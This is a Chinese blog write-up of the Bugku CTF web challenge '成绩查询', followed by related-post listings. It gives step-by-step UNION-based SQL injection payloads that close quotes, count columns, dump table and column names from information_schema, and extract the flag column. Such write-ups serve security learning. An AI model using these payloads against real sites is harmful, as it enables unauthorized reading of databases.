Bugku,Web:成绩查询

已于 2022-01-30 15:27:37 修改
阅读量937 收藏
点赞数
文章标签: p2p linq gnu
于 2022-01-30 15:24:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62260856/article/details/122752298
版权

测过滤

1’ 否

1’# 可

1‘+ 否

1’* 可

1‘- 可

加 # 引号闭合

1' order by 4# 回显

1' order by 5# 不回显

四个注入点

联合查询测注入点

-1' union select 1,2,3,4'

爆数据库

数据库版本:version() 

数据库库名:database() 

-1' union select 1,2,version(),database()'

 爆表

-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema = database()#

fl4g,sc

爆列

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema = database()#

skctf_flag,id,name,math,english,chinese 

看到 skctf_flag

-1' union select 1,2,3,skctf_flag from fl4g#

得到 flag

flag{62a29b5f4dc777b7c77bdabe26dfd8fe}

Part 03
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Bugku-web成绩查询
weixin_42939822的博客
03-14 3434
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
ctf刷题笔记之sql注入-union注入|bugku CTF:成绩查询
weixin_51614848的博客
08-18 1291
ctf刷题笔记
bugku-web-成绩查询
qq_75121443的博客
04-01 395
这里是一个post请求,必定连接数据库,可以尝试sql注入。联合查询注入得到当前权限账号、库名、MySQL版本号。首先注入点确定,这里有4个注入点。得到字段skctf_flag。
BugkuCTF: 成绩单(web
s0il的博客
04-02 749
题目描述: 让人看上去就是SQL注入。 提交一下,出现三列属性,flag就应该在这里面: 手动注入: 在表单输入1或者1#或者1--或者1++等返回正常,输入1'返回异常 库名、表名、字段名的获取: 联合查询 id=-1' union select 1,2,3,4# 之后返回: 或者执行-1' orde...
bugku--成绩查询
hxhabcd123的博客
08-28 1479
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
bugku WEB 成绩查询
weixin_52665674的博客
11-28 583
bugku web题:成绩查询
Bugku 成绩查询WEB
soysauce123的博客
08-15 462
今天咱们尝试用一下一个新的工具,sqlmap,这是一个用于sql注入等等相关的一个很不错的工具。大家好,作为一个CTF方面的小白,以后我也希望每做一次题目就和大家分享分享自己的解题过程。我们都清楚http的请求方式有两种一个get,一个post,这里就是post。那现在这就是里面最后的文件里,【确信】flag肯定就在里面了打开他!然后这里我们是用登陆框的形式输入的,我们就可以想到post登陆框注入。看看找到了啥,四个库~~就我分析这个ctf就很显眼,我估计就是这个嘿嘿。然后就可以开始查询了,先搜索库。...
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面...
P2p网络性能测度及监测系统模型
weixin_44630050的博客
07-14 484
OSI的位置-> 网络层。该种类型成为超级对等节点。
详细解析Kafaka Streams各个DSL操作符的用法
wuhao2343的博客
07-17 1588
在Kafka Streams,DSL(Domain Specific Language)指的是一组专门用于处理Kafka数据流的高级抽象和操作符。这些操作符以声明性的方式定义了数据流的转换、聚合、连接等处理逻辑,使得开发者可以更加专注于业务逻辑的实现,而不是底层的数据流处理细节。(Transformation Operators):这些操作符用于对KStream或KTable的数据进行转换,如mapflatMapfilter等。它们允许你对流的每个元素应用一个函数,从而生成新的流或表。
Maxwell同步mysql binlog日志执行的几条数据库命令
qq_36634055的博客
07-17 896
Maxwell在同步MySQL数据到Kafka的过程,需要跟踪和记录MySQL的二进制日志(binlog)的位置,这是为了确保它能够持续地从上次停止的地方开始读取新的变更数据。因此,在生产环境,通常会推荐使用更稳定和独立的存储方案来保存Maxwell的状态信息,以提高系统的整体可靠性。这种权限组合通常用于数据复制场景,特别是对于像Maxwell这样的工具,它需要读取MySQL的binlog来捕获数据库的更改事件,然后将这些事件转换为消息并发送到Kafka或类似的系统。表示所有数据库的所有表。
71、Flink 的 Hybrid Source 详解
猫猫爱吃小鱼粮
07-17 406
Flink 的 Hybrid Source 详解
SpringBoot 实现整合kafka的简单使用
林夕
07-17 228
1、引入kafka的依赖。6、常用Kafka的命令。
kafka-client如何打印连接日志
最新发布
weixin_43833540的博客
07-17 667
此外,你还可以为org.apache.kafka命名空间下的日志设置特定的日志级别,以便更精细地控制Kafka客户端的日志输出。首先,确保你的项目包含了Kafka客户端的依赖,以及SLF4J到Log4j2的桥接依赖和Log4j2的核心依赖。Kafka客户端的日志输出可能因Kafka版本和具体配置而异,因此请根据你使用的Kafka版本和配置调整上述步骤。请注意,你需要将你的Kafka客户端版本和你的Log4j2版本替换为实际使用的版本号。确保Kafka客户端和Log4j2的版本兼容。步骤三:运行你的应用。
Bugku CTF挑战:图像隐藏与解码技巧
本资源是一份针对IT安全和编码挑战的杂项题目练习集,共包含五个题目,旨在帮助学习者提升技能和理解各种技术问题。以下是每个题目的详细介绍: 1. 杂项第三十四题:图穷匕见 - 题目涉及解密隐藏在图像的信息。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Part 03

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值